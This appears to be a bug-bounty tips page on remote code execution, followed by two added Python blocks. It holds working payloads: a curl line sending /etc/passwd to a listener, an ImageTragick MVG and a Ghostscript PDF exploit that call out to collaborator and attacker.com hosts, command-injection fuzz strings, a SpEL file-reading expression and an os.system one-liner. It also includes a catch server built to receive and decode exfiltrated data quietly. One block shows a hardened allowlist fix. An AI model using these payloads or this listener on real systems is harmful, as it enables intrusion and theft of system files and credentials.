Book of BugBounty Tips
Remote Code Execution (RCE)
If the server only allows the GET and POST methods, try adding the header X-HTTP-Method-Override: PUT to reach the PUT handler and achieve RCE via PUT.
Blind RCE - Grabs /etc/passwd and dumps it to your netcat listener via POST
cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
Found an endpoint that does something with images? Give this a shot: request=input&&id, request=input|id, request=input`id`, or set up a nc listener and try request=input&&http://wgetyourserver.com:port and so on. Fuzz, fuzz, fuzz. #InfoSecurity #Infosec #BugBounty
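Why `input&&id`, `input|id` and `` input`id` `` work, and what the fix looks like. This is an added example, not code from the page or from any target: the `convert` command line is a constructed stand-in for whatever the image endpoint really runs, and `shell_parse` approximates how `sh` cuts a line at control operators and command substitutions so you can see which of your fuzz variants lands as a separate command.

```python
import re
import shlex
import subprocess


def vulnerable_command_line(user_input: str) -> str:
    """What a naive handler hands to /bin/sh after formatting the parameter into a string.
    The command itself is a constructed stand-in for the endpoint's real one."""
    return f"convert {user_input} -resize 200x200 /tmp/out.png"


SHELL_OPERATORS = {"&&", "||", "|", ";", "&"}


def shell_parse(cmdline: str) -> dict:
    """Approximate sh's view of a command line: split into separate commands at control
    operators and pull out `...` / $(...) substitutions. shlex with punctuation_chars=True
    tokenises ; & | ( ) as operators; a bare backtick or $ comes back as its own token."""
    tokens = list(shlex.shlex(cmdline, posix=True, punctuation_chars=True))
    commands, substitutions, current = [], [], []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in SHELL_OPERATORS:
            if current:
                commands.append(current)
            current = []
            i += 1
        elif tok == "`":                                   # `id`
            try:
                j = tokens.index("`", i + 1)
            except ValueError:                             # unterminated: sh would error out
                j = len(tokens)
            substitutions.append(tokens[i + 1:j])
            i = j + 1
        elif tok == "$" and i + 1 < len(tokens) and tokens[i + 1] == "(":   # $(id)
            try:
                j = tokens.index(")", i + 2)
            except ValueError:
                j = len(tokens)
            substitutions.append(tokens[i + 2:j])
            i = j + 1
        else:
            current.append(tok)
            i += 1
    if current:
        commands.append(current)
    return {"commands": commands, "substitutions": substitutions}


# Allowlist: alphanumeric first character (no leading '-' option or '|' / '@' ImageMagick
# prefixes), then a short run of filename-safe characters, no '/' so no path traversal.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def hardened_argv(user_input: str) -> list:
    """Validate the name, then build argv for execve: with no shell in the loop, &&, |, `
    and $( are plain bytes in one argument. The explicit png: coder prefix keeps ImageMagick
    from picking a coder by sniffing the file, which is what the MVG/ImageTragick tip on
    this page depends on (combine with a restrictive policy.xml in practice)."""
    if not SAFE_NAME.fullmatch(user_input):
        raise ValueError(f"rejected image name: {user_input!r}")
    return ["convert", f"png:{user_input}", "-resize", "200x200", "/tmp/out.png"]


def resize_hardened(user_input: str) -> int:
    """Run the allowlisted command without a shell; returns convert's exit status."""
    return subprocess.run(hardened_argv(user_input), check=False).returncode


if __name__ == "__main__":
    for probe in ("cat.png", "cat.png&&id", "cat.png|id", "cat.png`id`", "cat.png$(id)"):
        print(probe, "->", shell_parse(vulnerable_command_line(probe)))
        try:
            print("  hardened argv:", hardened_argv(probe))
        except ValueError as exc:
            print("  hardened:", exc)
```

Read the `shell_parse` output for each probe: `&&` and `|` produce a second command whose first word is `id`, while the backtick and `$( )` forms show up as substitutions that run before `convert` ever starts. The hardened path rejects all four, so if the same probes still behave differently on a target, the injection is happening somewhere other than a shell (for example inside ImageMagick's own filename parsing).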
If you ever get the ability to run arbitrary Python code on a server, try to get RCE by running import os;os.system("ls") and replacing "ls" with any shell command.
Recon to RCE: Google "upload" site:"target" -> upload form -> ImageTragick MVG -> RCE. PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1")' pop graphic-context
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64…) ) .putdeviceparams quit #BugBounty
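The blind-RCE, ImageTragick and PDF/PostScript tips above all phone home with curl: two of them POST a file body (`curl -d @-` / `curl -d "@/etc/passwd"`), the Ghostscript one puts `$(whoami|base64)` in a query string. A plain `nc -l` works, but the base64 arrives with its `+` turned into a space and its `=` padding often missing, and `whoami` leaves a trailing newline. This added catch server (not code from the page) takes both shapes and decodes what it can; the listening address, the default port 8080 and the parameter name `a` are assumptions.

```python
"""Catch server for blind-RCE callbacks: POST bodies and base64 query values."""
import base64
import binascii
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse


def decode_query_value(raw: str) -> str:
    """Recover text that a shell `$(cmd|base64)` pipeline produced.

    parse_qs has already turned '+' into ' ', trailing '=' padding is often lost, and
    a plain word that only uses base64 characters (e.g. 'root') must not be "decoded".
    Returns the original string when the value is not printable base64 text.
    """
    s = raw.replace(" ", "+").strip()
    s += "=" * (-len(s) % 4)
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return raw
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return raw


def extract_exfil(method: str, path: str, body: bytes) -> dict:
    """Normalise one callback into {method, path, params, body}.
    Query values are base64-decoded where that yields text; the body is kept verbatim."""
    url = urlparse(path)
    params = {k: [decode_query_value(v) for v in vals]
              for k, vals in parse_qs(url.query, keep_blank_values=True).items()}
    return {"method": method, "path": url.path, "params": params,
            "body": body.decode("utf-8", "replace")}


class ExfilHandler(BaseHTTPRequestHandler):
    def _collect(self) -> None:
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length > 0 else b""
        rec = extract_exfil(self.command, self.path, body)
        print(f"[{self.client_address[0]}] {rec['method']} {rec['path']} params={rec['params']}",
              flush=True)
        if rec["body"]:
            print(rec["body"], flush=True)
        # Always answer 200 so the injected curl exits quietly on the target.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_GET = _collect
    do_POST = _collect

    def log_message(self, *args) -> None:
        """Silence the default access log; the line printed above replaces it."""


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080   # assumed default
    print(f"listening on 0.0.0.0:{port}", flush=True)
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

One caveat on the POST variants: curl's `-d @file` strips newlines before sending, so `/etc/passwd` arrives as a single run of colon-separated fields. If you control the payload, `--data-binary @-` keeps the line breaks; if you do not, the body printed here is still complete, just unbroken.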
Does the target use AEM? Try the path target[.]com/etc/groovyconsole.html and use the payload in the pic. If you're lucky enough you can have a nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips
If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())